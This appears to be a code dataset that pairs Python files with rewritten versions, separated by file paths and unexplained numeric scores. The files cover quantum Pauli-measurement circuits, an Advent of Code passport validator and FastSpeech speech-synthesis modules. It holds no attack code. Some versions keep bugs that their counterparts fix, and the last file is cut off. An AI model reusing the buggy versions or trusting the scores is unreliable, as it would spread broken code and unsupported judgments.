        :param preceding_circuits: Circuits that precede the measurement circuit
        :param shots: Number of measurement shots
        :param backend: Backend to be used in this task
        :return: Expectation value of the Pauli terms
        """
        expectation = 0
        for coeff, pauli_str in self._pauli_terms:
            # An all-identity term contributes its coefficient directly.
            if pauli_str.lower().count('i') == len(pauli_str):
                expectation += coeff
                continue
            active_qubits = [i for i, c in enumerate(pauli_str) if c != 'i']
            env = QEnv()
            env.backend(backend)
            q = env.Q.createList(self._num)
            # State preparation first, then the measurement rotations.
            for circuit in preceding_circuits:
                circuit.add_circuit(q)
            self.add_circuit(q, pauli_str.lower())
            # Submit job
            counts = env.commit(shots, fetchMeasure=True)['counts']
            # Count keys appear little-endian here: qubit i maps to
            # key[-i - 1] (consistent with the kron ordering used in
            # SimultaneousPauliMeasurementCircuit below).
            filtered_counts = [(counts[key], [key[-i - 1] for i in active_qubits])
                               for key in counts]
            expecval = sum([((-1) ** key.count('1')) * val / shots
                            for val, key in filtered_counts])
            expectation += coeff * expecval
        return expectation


class PauliMeasurementCircuitWithAncilla(BasicCircuit):
    """Pauli Measurement Circuit with Ancilla class"""

    def __init__(self, num: int, pauli_terms: List):
        """The constructor of the PauliMeasurementCircuitWithAncilla class

        :param num: Number of qubits
        :param pauli_terms: Pauli terms to be measured, as a list of
            (coefficient, pauli string) pairs
        """
        super().__init__(num)
        self._pauli_terms = pauli_terms

    def add_circuit(self, q: QRegPool, pauli_str: str):
        """Adds the pauli measurement circuit to the register

        The parity of every non-identity factor is accumulated onto the
        ancilla (last) qubit with CX gates, so only the ancilla is measured.

        :param q: Quantum register to which this circuit is added
        :param pauli_str: Pauli string to be measured (lower case)
        """
        for i in range(self._num):
            if pauli_str[i] == 'x':
                H(q[i])
                CX(q[i], q[-1])
            elif pauli_str[i] == 'y':
                S(q[i])
                H(q[i])
                CX(q[i], q[-1])
            elif pauli_str[i] == 'z':
                CX(q[i], q[-1])
        # Measure the ancilla qubit only
        MeasureZ([q[-1]], [0])

    def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float:
        """Computes the expectation value of the Pauli terms

        :param preceding_circuits: Circuits that precede the measurement circuit
        :param shots: Number of measurement shots
        :param backend: Backend to be used in this task
        :return: Expectation value of the Pauli terms
        """
        expectation = 0
        for coeff, pauli_str in self._pauli_terms:
            # An all-identity term contributes its coefficient directly.
            if pauli_str.lower().count('i') == len(pauli_str):
                expectation += coeff
                continue
            env = QEnv()
            env.backend(backend)
            # One extra qubit: the parity ancilla.
            q = env.Q.createList(self._num + 1)
            for circuit in preceding_circuits:
                circuit.add_circuit(q[:self._num])
            self.add_circuit(q, pauli_str.lower())
            # Submit job
            counts = env.commit(shots, fetchMeasure=True)['counts']
            # <P> = P(ancilla=0) - P(ancilla=1)
            expecval = (counts.get('0', 0) - counts.get('1', 0)) / shots
            expectation += coeff * expecval
        return expectation


class SimultaneousPauliMeasurementCircuit(BasicCircuit):
    """Simultaneous Pauli Measurement Circuit for Qubitwise Commute Pauli Terms"""

    def __init__(self, num: int, pauli_terms: List):
        """The constructor of the SimultaneousPauliMeasurementCircuit class

        :param num: Number of qubits
        :param pauli_terms: Pauli terms to be measured
        """
        super().__init__(num)
        self._pauli_terms = pauli_terms

    def add_circuit(self, q: 'QRegPool', clique: List):
        """Adds the simultaneous pauli measurement circuit to the register

        :param q: Quantum register to which this circuit is added
        :param clique: Clique of qubitwise-commuting Pauli terms measured together
        """
        for index in range(self._num):
            # Qubitwise commutation guarantees at most one non-identity
            # operator kind per qubit across the clique.
            term = [pauli[index] for _, pauli in clique]
            if 'x' in term:
                RY(-np.pi / 2)(q[index])
            elif 'y' in term:
                RX(np.pi / 2)(q[index])
        # Measure all qubits (list(...) for consistency with the other classes)
        MeasureZ(q, list(range(self._num)))

    def _single_clique_expectation(self, clique: List, counts: Dict, shots: int) -> float:
        """Computes the expectation value of the target Pauli clique"""
        # Reformulate the measurement counts as a probability list over the
        # full computational basis.
        basis = [''.join(x) for x in itertools.product('01', repeat=self._num)]
        prob = [counts.get(key, 0) / shots for key in basis]
        # Each term's diagonal eigenvalue vector is the Kronecker product of
        # per-qubit (+1, ±1) factors; later qubits end up slowest-varying,
        # matching the little-endian count keys.
        expecval = 0
        for coeff, pauli_str in clique:
            eigenvalues = None
            for operator in pauli_str:
                factor = np.array([1.0, 1.0 if operator == 'i' else -1.0])
                eigenvalues = factor if eigenvalues is None \
                    else np.kron(factor, eigenvalues)
            expecval += coeff * np.dot(eigenvalues, prob)
        return expecval

    def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float:
        """Computes the expectation value of the Pauli terms

        :param preceding_circuits: Circuits that precede the measurement circuit
        :param shots: Number of measurement shots
        :param backend: Backend to be used in this task
        :return: Expectation value of the Pauli terms
        """
        # Group the hamiltonian into qubitwise-commuting cliques.
        cliques = grouping_hamiltonian(self._pauli_terms)
        expectation = 0
        for pauli_clique in cliques:
            env = QEnv()
            env.backend(backend)
            q = env.Q.createList(self._num)
            for circuit in preceding_circuits:
                circuit.add_circuit(q)
            self.add_circuit(q, pauli_clique)
            # Submit job
            counts = env.commit(shots, fetchMeasure=True)['counts']
            expectation += self._single_clique_expectation(pauli_clique,
                                                           counts, shots)
        return expectation
Example/QAPP/qapp/circuit/pauli_measurement_circuit.py
from typing import Dict, List
from copy import deepcopy
import itertools
import numpy as np
from QCompute.QPlatform.QEnv import QEnv
from QCompute.QPlatform.QRegPool import QRegPool
from QCompute.QPlatform.QOperation.RotationGate import RX, RY
from QCompute.QPlatform.QOperation.FixedGate import H, S, CX
from QCompute.QPlatform.QOperation.Measure import MeasureZ
from qapp.utils import grouping_hamiltonian
from .basic_circuit import BasicCircuit


class PauliMeasurementCircuit(BasicCircuit):
    """Measurement circuit evaluating a weighted sum of Pauli strings,
    one submitted job per non-identity term."""

    def __init__(self, num: int, pauli_terms: str):
        """Create the circuit.

        :param num: Number of qubits
        :param pauli_terms: Pauli terms to be measured
        """
        super().__init__(num)
        self._pauli_terms = deepcopy(pauli_terms)

    def add_circuit(self, q: QRegPool, pauli_str: str):
        """Append basis-change rotations and a full Z measurement.

        :param q: Quantum register to which this circuit is added
        :param pauli_str: Pauli string to be measured
        """
        for idx in range(self._num):
            op = pauli_str[idx]
            if op == 'x':
                RY(-np.pi / 2)(q[idx])
            elif op == 'y':
                RX(np.pi / 2)(q[idx])
        MeasureZ(q, list(range(len(q))))

    def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float:
        """Estimate sum_k c_k <P_k> from measurement counts.

        :param preceding_circuits: Circuits run before this measurement circuit
        :param shots: Number of measurement shots
        :param backend: Backend to be used in this task
        :return: Expectation value of the Pauli terms
        """
        total = 0
        for weight, term in self._pauli_terms:
            lowered = term.lower()
            # A pure identity term needs no measurement at all.
            if lowered.count('i') == len(term):
                total += weight
                continue
            active = []
            for pos, char in enumerate(term):
                if char != 'i':
                    active.append(pos)
            env = QEnv()
            env.backend(backend)
            q = env.Q.createList(self._num)
            for circuit in preceding_circuits:
                circuit.add_circuit(q)
            self.add_circuit(q, lowered)
            counts = env.commit(shots, fetchMeasure=True)['counts']
            # Parity of the active bits fixes the sign of each outcome.
            term_value = 0
            for key in counts:
                bits = [key[-pos - 1] for pos in active]
                term_value += ((-1) ** bits.count('1')) * counts[key] / shots
            total += weight * term_value
        return total


class PauliMeasurementCircuitWithAncilla(BasicCircuit):
    """Measurement circuit that folds each term's parity onto an ancilla
    qubit and measures only that ancilla."""

    def __init__(self, num: int, pauli_terms: str):
        """Create the circuit.

        :param num: Number of qubits
        :param pauli_terms: Pauli terms to be measured
        """
        super().__init__(num)
        self._pauli_terms = pauli_terms

    def add_circuit(self, q: QRegPool, pauli_str: str):
        """Accumulate each non-identity factor onto the last (ancilla) qubit.

        :param q: Quantum register to which this circuit is added
        :param pauli_str: Pauli string to be measured
        """
        for idx in range(self._num):
            op = pauli_str[idx]
            if op == 'x':
                H(q[idx])
                CX(q[idx], q[-1])
            elif op == 'y':
                S(q[idx])
                H(q[idx])
                CX(q[idx], q[-1])
            elif op == 'z':
                CX(q[idx], q[-1])
        MeasureZ([q[-1]], [0])

    def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float:
        """Estimate sum_k c_k <P_k> via the ancilla's 0/1 statistics.

        :param preceding_circuits: Circuits run before this measurement circuit
        :param shots: Number of measurement shots
        :param backend: Backend to be used in this task
        :return: Expectation value of the Pauli terms
        """
        total = 0
        for weight, term in self._pauli_terms:
            lowered = term.lower()
            if lowered.count('i') == len(term):
                total += weight
                continue
            env = QEnv()
            env.backend(backend)
            q = env.Q.createList(self._num + 1)
            for circuit in preceding_circuits:
                circuit.add_circuit(q[:self._num])
            self.add_circuit(q, lowered)
            counts = env.commit(shots, fetchMeasure=True)['counts']
            # <P> = P(ancilla reads 0) - P(ancilla reads 1)
            expecval = (counts.get('0', 0) - counts.get('1', 0)) / shots
            total += weight * expecval
        return total


class SimultaneousPauliMeasurementCircuit(BasicCircuit):
    """Measures whole qubitwise-commuting cliques of Pauli terms with a
    single shared set of shots per clique."""

    def __init__(self, num: int, pauli_terms: List):
        """Create the circuit.

        :param num: Number of qubits
        :param pauli_terms: Pauli terms to be measured
        """
        super().__init__(num)
        self._pauli_terms = pauli_terms

    def add_circuit(self, q: 'QRegPool', clique: List):
        """Rotate each qubit according to the clique's shared operator.

        :param q: Quantum register to which this circuit is added
        :param clique: Clique of Pauli terms to be measured together
        """
        for idx in range(self._num):
            column = [pauli[idx] for _, pauli in clique]
            if 'x' in column:
                RY(-np.pi / 2)(q[idx])
            elif 'y' in column:
                RX(np.pi / 2)(q[idx])
        MeasureZ(q, range(self._num))

    def _single_clique_expectation(self, clique: List, counts: Dict, shots: int) -> float:
        """Fold one clique's measurement statistics into its expectation."""
        basis = []
        for bits in itertools.product('01', repeat=self._num):
            basis.append(''.join(bits))
        prob = []
        for key in basis:
            prob.append(counts.get(key, 0) / shots)
        value = 0
        for coeff, pauli_str in clique:
            # Diagonal eigenvalues as a Kronecker product of per-qubit
            # (+1, ±1) factors, built left-to-right over the string.
            eigenvalues = None
            for operator in pauli_str:
                factor = np.array([1.0, 1.0 if operator == 'i' else -1.0])
                if eigenvalues is None:
                    eigenvalues = factor
                else:
                    eigenvalues = np.kron(factor, eigenvalues)
            value += coeff * np.dot(eigenvalues, prob)
        return value

    def get_expectation(self, preceding_circuits: List[BasicCircuit], shots: int, backend: str) -> float:
        """Estimate the hamiltonian expectation clique by clique.

        :param preceding_circuits: Circuits run before this measurement circuit
        :param shots: Number of measurement shots
        :param backend: Backend to be used in this task
        :return: Expectation value of the Pauli terms
        """
        cliques = grouping_hamiltonian(self._pauli_terms)
        total = 0
        for pauli_clique in cliques:
            env = QEnv()
            env.backend(backend)
            q = env.Q.createList(self._num)
            for circuit in preceding_circuits:
                circuit.add_circuit(q)
            self.add_circuit(q, pauli_clique)
            counts = env.commit(shots, fetchMeasure=True)['counts']
            total += self._single_clique_expectation(pauli_clique, counts, shots)
        return total
0.930054
0.617743
import re

INPUT_FILE = "input.txt"

# Fields a passport must contain ('cid' is deliberately ignored).
REQUIRED_FIELDS = {'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
EYE_COLORS = {'amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth'}

# Compiled once; the originals were re-built for every field.
HGT_RE = re.compile(r'^([0-9]+)(cm|in)$')
HCL_RE = re.compile(r'^#[0-9a-f]{6}$')
PID_RE = re.compile(r'^[0-9]{9}$')


def _year_ok(value, lo, hi):
    """True when `value` is a 4-digit year within [lo, hi]."""
    return len(value) == 4 and value.isdigit() and lo <= int(value) <= hi


def is_valid_field(key, value):
    """Validate one key:value pair per the AoC 2020 day 4 part 2 rules."""
    if key == 'byr':
        return _year_ok(value, 1920, 2002)
    if key == 'iyr':
        return _year_ok(value, 2010, 2020)
    if key == 'eyr':
        return _year_ok(value, 2020, 2030)
    if key == 'hgt':
        m = HGT_RE.match(value)
        if m is None:
            return False
        num, unit = int(m.group(1)), m.group(2)
        return (150 <= num <= 193) if unit == 'cm' else (59 <= num <= 76)
    if key == 'hcl':
        return HCL_RE.match(value) is not None
    if key == 'ecl':
        return value in EYE_COLORS
    if key == 'pid':
        return PID_RE.match(value) is not None
    return False  # unknown key ('cid', ...) never counts


def parse_passports(text):
    """Split raw input into one space-joined record per passport.

    Records are separated by blank lines; a trailing blank line no longer
    produces a spurious empty record (BUG FIX: the original appended one,
    then crashed with IndexError when splitting '' on ':').
    """
    return [' '.join(block.split()) for block in text.split('\n\n')
            if block.strip()]


def count_valid(passports):
    """Count passports whose seven required fields all validate.

    BUG FIX: the original counted valid parts (>= 7), so duplicated valid
    keys could mask a missing field; distinct keys are collected instead.
    """
    valid = 0
    for passport in passports:
        seen = set()
        for part in passport.split():
            # Guard against malformed parts (BUG FIX: `part.split(':')[1]`
            # raised IndexError on parts without a colon).
            if ':' not in part:
                continue
            key, value = part.split(':', 1)
            if key in REQUIRED_FIELDS and is_valid_field(key, value):
                seen.add(key)
        if seen == REQUIRED_FIELDS:
            valid += 1
    return valid


def main():
    """Read the puzzle input and print the number of valid passports."""
    # `with` closes the handle (the original leaked it); the main-guard
    # below makes the module importable/testable without doing I/O.
    with open(INPUT_FILE, 'r') as f:
        passports = parse_passports(f.read())
    print('valid = ', count_valid(passports))


if __name__ == "__main__":
    main()
day_4/passport_processing_part_2.py
import re

filename = "input.txt"

valid_props = {'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}

# Gather blank-line-separated records; each passport becomes one
# space-joined string (a final record is flushed after the loop).
f = open(filename, 'r')
passports = []
buffer = ''
for raw in f.readlines():
    raw = raw.strip()
    buffer = buffer + raw + ' '
    if raw == "":
        passports.append(buffer.strip())
        buffer = ''
passports.append(buffer.strip())

valid = 0
for record in passports:
    ok_count = 0
    for chunk in record.split(' '):
        pieces = chunk.split(':')
        prop = pieces[0]
        data = pieces[1]
        print(prop, data)
        if prop not in valid_props:
            continue
        # Each rule falls through to the increment only when it passes.
        if prop == 'byr':
            if len(data) != 4 or int(data) < 1920 or int(data) > 2002:
                continue
        if prop == 'iyr':
            if len(data) != 4 or int(data) < 2010 or int(data) > 2020:
                continue
        if prop == 'eyr':
            if len(data) != 4 or int(data) < 2020 or int(data) > 2030:
                continue
        if prop == 'hgt':
            m = re.match('^([0-9]+)(cm|in)$', data)
            if m is None:
                continue
            magnitude = int(m.groups()[0])
            unit = m.groups()[1]
            if unit == 'cm' and (magnitude < 150 or magnitude > 193):
                continue
            if unit == 'in' and (magnitude < 59 or magnitude > 76):
                continue
        if prop == 'hcl':
            if re.match('^#[0-9a-f]{6}$', data) is None:
                continue
        if prop == 'ecl':
            if data not in {'amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth'}:
                continue
        if prop == 'pid':
            if re.match('^[0-9]{9}$', data) is None:
                continue
        ok_count += 1
    # A passport is valid when all seven required properties checked out.
    if ok_count >= 7:
        valid += 1
print('valid = ', valid)
0.117965
0.124426
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from numba import jit
import numpy as np
import copy
import math

import hparams as hp
import utils

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')


def get_sinusoid_encoding_table(n_position, d_hid, padding_idx=None):
    ''' Sinusoid position encoding table

    :param n_position: number of positions (rows of the table)
    :param d_hid: encoding dimension (columns of the table)
    :param padding_idx: optional row index zeroed out for padding
    :return: FloatTensor of shape (n_position, d_hid)
    '''
    def cal_angle(position, hid_idx):
        return position / np.power(10000, 2 * (hid_idx // 2) / d_hid)

    def get_posi_angle_vec(position):
        return [cal_angle(position, hid_j) for hid_j in range(d_hid)]

    sinusoid_table = np.array([get_posi_angle_vec(pos_i)
                               for pos_i in range(n_position)])
    sinusoid_table[:, 0::2] = np.sin(sinusoid_table[:, 0::2])  # dim 2i
    sinusoid_table[:, 1::2] = np.cos(sinusoid_table[:, 1::2])  # dim 2i+1
    if padding_idx is not None:
        # zero vector for padding dimension
        sinusoid_table[padding_idx] = 0.
    return torch.FloatTensor(sinusoid_table)


def clones(module, N):
    """Return a ModuleList containing N deep copies of `module`."""
    return nn.ModuleList([copy.deepcopy(module) for _ in range(N)])


# @jit(nopython=True)
def create_alignment(base_mat, duration_predictor_output):
    """Fill `base_mat` with a phoneme-to-frame alignment, in place.

    :param base_mat: zero array of shape (N, total_frames, L)
    :param duration_predictor_output: int array (N, L) of per-phoneme durations
    :return: the filled `base_mat`
    """
    N, L = duration_predictor_output.shape
    for i in range(N):
        count = 0
        for j in range(L):
            # Phoneme j owns the frame rows [count, count + duration).
            for k in range(duration_predictor_output[i][j]):
                base_mat[i][count + k][j] = 1
            count = count + duration_predictor_output[i][j]
    return base_mat


class LengthRegulator(nn.Module):
    """ Length Regulator: expands encoder outputs by (predicted) durations. """

    def __init__(self):
        super(LengthRegulator, self).__init__()
        self.duration_predictor = DurationPredictor()

    def LR(self, x, duration_predictor_output, mel_max_length=None):
        """Expand `x` (N, L, D) to (N, total_frames, D) via the durations."""
        expand_max_len = torch.max(
            torch.sum(duration_predictor_output, -1), -1)[0]
        # Explicit int(): expand_max_len is a 0-dim tensor and torch.zeros
        # expects plain integer sizes.
        alignment = torch.zeros(duration_predictor_output.size(0),
                                int(expand_max_len),
                                duration_predictor_output.size(1)).numpy()
        alignment = create_alignment(alignment,
                                     duration_predictor_output.cpu().numpy())
        alignment = torch.from_numpy(alignment).to(device)
        output = alignment @ x
        # BUG FIX: `if mel_max_length:` silently skipped padding when the
        # caller passed 0; test identity against None instead.
        if mel_max_length is not None:
            output = F.pad(
                output, (0, 0, 0, mel_max_length - output.size(1), 0, 0))
        return output

    def forward(self, x, alpha=1.0, target=None, mel_max_length=None):
        duration_predictor_output = self.duration_predictor(x)
        if target is not None:
            # Teacher forcing: expand by the ground-truth durations.
            output = self.LR(x, target, mel_max_length=mel_max_length)
            return output, duration_predictor_output
        else:
            # Inference: round predicted durations, scaled by alpha.
            duration_predictor_output = (
                (duration_predictor_output + 0.5) * alpha).int()
            output = self.LR(x, duration_predictor_output)
            mel_pos = torch.stack(
                [torch.Tensor([i + 1 for i in range(output.size(1))])
                 ]).long().to(device)
            return output, mel_pos


class DurationPredictor(nn.Module):
    """ Duration Predictor: two conv blocks + linear head, one value per step. """

    def __init__(self):
        super(DurationPredictor, self).__init__()
        self.input_size = hp.encoder_dim
        self.filter_size = hp.duration_predictor_filter_size
        self.kernel = hp.duration_predictor_kernel_size
        self.conv_output_size = hp.duration_predictor_filter_size
        self.dropout = hp.dropout

        self.conv_layer = nn.Sequential(OrderedDict([
            ("conv1d_1", Conv(self.input_size, self.filter_size,
                              kernel_size=self.kernel, padding=1)),
            ("layer_norm_1", nn.LayerNorm(self.filter_size)),
            ("relu_1", nn.ReLU()),
            ("dropout_1", nn.Dropout(self.dropout)),
            ("conv1d_2", Conv(self.filter_size, self.filter_size,
                              kernel_size=self.kernel, padding=1)),
            ("layer_norm_2", nn.LayerNorm(self.filter_size)),
            ("relu_2", nn.ReLU()),
            ("dropout_2", nn.Dropout(self.dropout))
        ]))
        self.linear_layer = Linear(self.conv_output_size, 1)
        self.relu = nn.ReLU()

    def forward(self, encoder_output):
        """Predict one non-negative duration per input time step -> (B, T)."""
        out = self.conv_layer(encoder_output)
        out = self.linear_layer(out)
        out = self.relu(out)
        # BUG FIX: the original `out.squeeze()` also dropped the batch
        # dimension when batch size was 1, and the eval-time `unsqueeze(0)`
        # patch produced a wrong (1, B, T) shape for batched inference.
        # Squeezing only the final size-1 channel dim yields (B, T) always.
        out = out.squeeze(-1)
        return out


class BatchNormConv1d(nn.Module):
    """Conv1d (no bias) -> optional activation -> BatchNorm1d."""

    def __init__(self, in_dim, out_dim, kernel_size, stride, padding,
                 activation=None, w_init_gain='linear'):
        super(BatchNormConv1d, self).__init__()
        self.conv1d = nn.Conv1d(in_dim, out_dim, kernel_size=kernel_size,
                                stride=stride, padding=padding, bias=False)
        self.bn = nn.BatchNorm1d(out_dim)
        self.activation = activation
        torch.nn.init.xavier_uniform_(
            self.conv1d.weight,
            gain=torch.nn.init.calculate_gain(w_init_gain))

    def forward(self, x):
        x = self.conv1d(x)
        if self.activation is not None:
            x = self.activation(x)
        return self.bn(x)


class Conv(nn.Module):
    """
    Convolution Module operating on (batch, time, channels) inputs.
    """

    def __init__(self, in_channels, out_channels, kernel_size=1, stride=1,
                 padding=0, dilation=1, bias=True, w_init='linear'):
        """
        :param in_channels: dimension of input
        :param out_channels: dimension of output
        :param kernel_size: size of kernel
        :param stride: size of stride
        :param padding: size of padding
        :param dilation: dilation rate
        :param bias: boolean. if True, bias is included.
        :param w_init: str. weight inits with xavier initialization.
        """
        super(Conv, self).__init__()
        self.conv = nn.Conv1d(in_channels, out_channels,
                              kernel_size=kernel_size, stride=stride,
                              padding=padding, dilation=dilation, bias=bias)
        nn.init.xavier_uniform_(
            self.conv.weight, gain=nn.init.calculate_gain(w_init))

    def forward(self, x):
        # nn.Conv1d expects channels-first; transpose in and back out.
        x = x.contiguous().transpose(1, 2)
        x = self.conv(x)
        x = x.contiguous().transpose(1, 2)
        return x


class Linear(nn.Module):
    """
    Linear Module with Xavier-uniform initialization.
    """

    def __init__(self, in_dim, out_dim, bias=True, w_init='linear'):
        """
        :param in_dim: dimension of input
        :param out_dim: dimension of output
        :param bias: boolean. if True, bias is included.
        :param w_init: str. weight inits with xavier initialization.
        """
        super(Linear, self).__init__()
        self.linear_layer = nn.Linear(in_dim, out_dim, bias=bias)
        nn.init.xavier_uniform_(
            self.linear_layer.weight, gain=nn.init.calculate_gain(w_init))

    def forward(self, x):
        return self.linear_layer(x)


class Highway(nn.Module):
    """Highway layer: T-gated mix of a transformed path and the identity."""

    def __init__(self, in_size, out_size):
        super(Highway, self).__init__()
        self.H = nn.Linear(in_size, out_size)
        self.H.bias.data.zero_()
        self.T = nn.Linear(in_size, out_size)
        # Bias the gate toward the carry (identity) path initially.
        self.T.bias.data.fill_(-1)
        self.relu = nn.ReLU()
        self.sigmoid = nn.Sigmoid()

    def forward(self, inputs):
        H = self.relu(self.H(inputs))
        T = self.sigmoid(self.T(inputs))
        return H * T + inputs * (1.0 - T)


class Prenet(nn.Module):
    """
    Prenet before passing through the network:
    two Linear-ReLU-Dropout(0.5) stages.
    """

    def __init__(self, input_size, hidden_size, output_size):
        super(Prenet, self).__init__()
        self.input_size = input_size
        self.output_size = output_size
        self.hidden_size = hidden_size
        self.layer = nn.Sequential(OrderedDict([
            ('fc1', Linear(self.input_size, self.hidden_size)),
            ('relu1', nn.ReLU()),
            ('dropout1', nn.Dropout(0.5)),
            ('fc2', Linear(self.hidden_size, self.output_size)),
            ('relu2', nn.ReLU()),
            ('dropout2', nn.Dropout(0.5)),
        ]))

    def forward(self, x):
        return self.layer(x)


class CBHG(nn.Module):
    """CBHG module: a recurrent neural network composed of:
        - 1-d convolution banks
        - Highway networks + residual connections
        - Bidirectional gated recurrent units
    """

    def __init__(self, in_dim, K=16, projections=[128, 128]):
        super(CBHG, self).__init__()
        self.in_dim = in_dim
        self.relu = nn.ReLU()
        self.conv1d_banks = nn.ModuleList(
            [BatchNormConv1d(in_dim, in_dim, kernel_size=k, stride=1,
                             padding=k // 2, activation=self.relu)
             for k in range(1, K + 1)])
        self.max_pool1d = nn.MaxPool1d(kernel_size=2, stride=1, padding=1)
        in_sizes = [K * in_dim] + projections[:-1]
        activations = [self.relu] * (len(projections) - 1) + [None]
        self.conv1d_projections = nn.ModuleList(
            [BatchNormConv1d(in_size, out_size, kernel_size=3, stride=1,
                             padding=1, activation=ac)
             for (in_size, out_size, ac) in zip(
                 in_sizes, projections, activations)])
        self.pre_highway = nn.Linear(projections[-1], in_dim, bias=False)
        self.highways = nn.ModuleList(
            [Highway(in_dim, in_dim) for _ in range(4)])
        self.gru = nn.GRU(
            in_dim, in_dim, 1, batch_first=True, bidirectional=True)

    def forward(self, inputs, input_lengths=None):
        # (B, T_in, in_dim)
        x = inputs
        # Needed to perform conv1d on time-axis: (B, in_dim, T_in)
        if x.size(-1) == self.in_dim:
            x = x.transpose(1, 2)
        T = x.size(-1)
        # (B, in_dim*K, T_in) — concat conv1d bank outputs
        x = torch.cat([conv1d(x)[:, :, :T] for conv1d in self.conv1d_banks],
                      dim=1)
        assert x.size(1) == self.in_dim * len(self.conv1d_banks)
        x = self.max_pool1d(x)[:, :, :T]
        for conv1d in self.conv1d_projections:
            x = conv1d(x)
        # (B, T_in, in_dim) — back to the original shape
        x = x.transpose(1, 2)
        if x.size(-1) != self.in_dim:
            x = self.pre_highway(x)
        # Residual connection
        x += inputs
        for highway in self.highways:
            x = highway(x)
        if input_lengths is not None:
            x = nn.utils.rnn.pack_padded_sequence(
                x, input_lengths, batch_first=True)
        # (B, T_in, in_dim*2)
        self.gru.flatten_parameters()
        outputs, _ = self.gru(x)
        if input_lengths is not None:
            outputs, _ = nn.utils.rnn.pad_packed_sequence(
                outputs, batch_first=True)
        return outputs


if __name__ == "__main__":
    # TEST: alignment construction and the expansion matmul.
    a = torch.Tensor([[2, 3, 4], [1, 2, 3]])
    b = torch.Tensor([[5, 6, 7], [7, 8, 9]])
    c = torch.stack([a, b])
    d = torch.Tensor([[1, 4], [6, 3]]).int()
    expand_max_len = torch.max(torch.sum(d, -1), -1)[0]
    base = torch.zeros(c.size(0), int(expand_max_len), c.size(1))
    alignment = create_alignment(base.numpy(), d.numpy())
    print(alignment)
    print(torch.from_numpy(alignment) @ c)
modules.py
import torch
import torch.nn as nn
import torch.nn.functional as F
from collections import OrderedDict
from numba import jit
import numpy as np
import copy
import math

import hparams as hp
import utils

device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')


def get_sinusoid_encoding_table(n_position, d_hid, padding_idx=None):
    """Build the sinusoidal positional-encoding table as a FloatTensor."""
    table = np.array(
        [[pos / np.power(10000, 2 * (col // 2) / d_hid)
          for col in range(d_hid)]
         for pos in range(n_position)])
    table[:, 0::2] = np.sin(table[:, 0::2])  # even columns -> sine
    table[:, 1::2] = np.cos(table[:, 1::2])  # odd columns -> cosine
    if padding_idx is not None:
        table[padding_idx] = 0.  # padding row carries no position signal
    return torch.FloatTensor(table)


def clones(module, N):
    """Produce N independent deep copies of `module` in a ModuleList."""
    copies = [copy.deepcopy(module) for _ in range(N)]
    return nn.ModuleList(copies)


# @jit(nopython=True)
def create_alignment(base_mat, duration_predictor_output):
    """Mark `base_mat` so each phoneme column covers its block of frame rows."""
    batch, length = duration_predictor_output.shape
    for b in range(batch):
        cursor = 0
        for j in range(length):
            dur = duration_predictor_output[b][j]
            for k in range(dur):
                base_mat[b][cursor + k][j] = 1
            cursor += dur
    return base_mat


class LengthRegulator(nn.Module):
    """Expands encoder states in time according to per-phoneme durations."""

    def __init__(self):
        super(LengthRegulator, self).__init__()
        self.duration_predictor = DurationPredictor()

    def LR(self, x, duration_predictor_output, mel_max_length=None):
        """Repeat each step of `x` by its duration via a 0/1 alignment matrix."""
        total_len = torch.max(
            torch.sum(duration_predictor_output, -1), -1)[0]
        align = torch.zeros(duration_predictor_output.size(0),
                            total_len,
                            duration_predictor_output.size(1)).numpy()
        align = create_alignment(align,
                                 duration_predictor_output.cpu().numpy())
        align = torch.from_numpy(align).to(device)
        output = torch.matmul(align, x)
        if mel_max_length:
            pad_spec = (0, 0, 0, mel_max_length - output.size(1), 0, 0)
            output = F.pad(output, pad_spec)
        return output

    def forward(self, x, alpha=1.0, target=None, mel_max_length=None):
        predicted = self.duration_predictor(x)
        if target is not None:
            # Training path: expand by ground-truth durations.
            return self.LR(x, target, mel_max_length=mel_max_length), predicted
        # Inference path: round the (alpha-scaled) predictions.
        rounded = ((predicted + 0.5) * alpha).int()
        output = self.LR(x, rounded)
        positions = [i + 1 for i in range(output.size(1))]
        mel_pos = torch.stack([torch.Tensor(positions)]).long().to(device)
        return output, mel_pos


class DurationPredictor(nn.Module):
    """Two conv blocks plus a linear head predicting one duration per step."""

    def __init__(self):
        super(DurationPredictor, self).__init__()
        self.input_size = hp.encoder_dim
        self.filter_size = hp.duration_predictor_filter_size
        self.kernel = hp.duration_predictor_kernel_size
        self.conv_output_size = hp.duration_predictor_filter_size
        self.dropout = hp.dropout

        stages = OrderedDict()
        stages["conv1d_1"] = Conv(self.input_size, self.filter_size,
                                  kernel_size=self.kernel, padding=1)
        stages["layer_norm_1"] = nn.LayerNorm(self.filter_size)
        stages["relu_1"] = nn.ReLU()
        stages["dropout_1"] = nn.Dropout(self.dropout)
        stages["conv1d_2"] = Conv(self.filter_size, self.filter_size,
                                  kernel_size=self.kernel, padding=1)
        stages["layer_norm_2"] = nn.LayerNorm(self.filter_size)
        stages["relu_2"] = nn.ReLU()
        stages["dropout_2"] = nn.Dropout(self.dropout)
        self.conv_layer = nn.Sequential(stages)

        self.linear_layer = Linear(self.conv_output_size, 1)
        self.relu = nn.ReLU()

    def forward(self, encoder_output):
        out = self.relu(self.linear_layer(self.conv_layer(encoder_output)))
        # NOTE(review): squeeze() also drops a batch dim of size 1; the
        # eval-time unsqueeze below restores it — confirm batched inference
        # is never used with this shape handling.
        out = out.squeeze()
        if not self.training:
            out = out.unsqueeze(0)
        return out


class BatchNormConv1d(nn.Module):
    """Bias-free Conv1d followed by an optional activation and BatchNorm."""

    def __init__(self, in_dim, out_dim, kernel_size, stride, padding,
                 activation=None, w_init_gain='linear'):
        super(BatchNormConv1d, self).__init__()
        self.conv1d = nn.Conv1d(in_dim, out_dim, kernel_size=kernel_size,
                                stride=stride, padding=padding, bias=False)
        self.bn = nn.BatchNorm1d(out_dim)
        self.activation = activation
        gain = torch.nn.init.calculate_gain(w_init_gain)
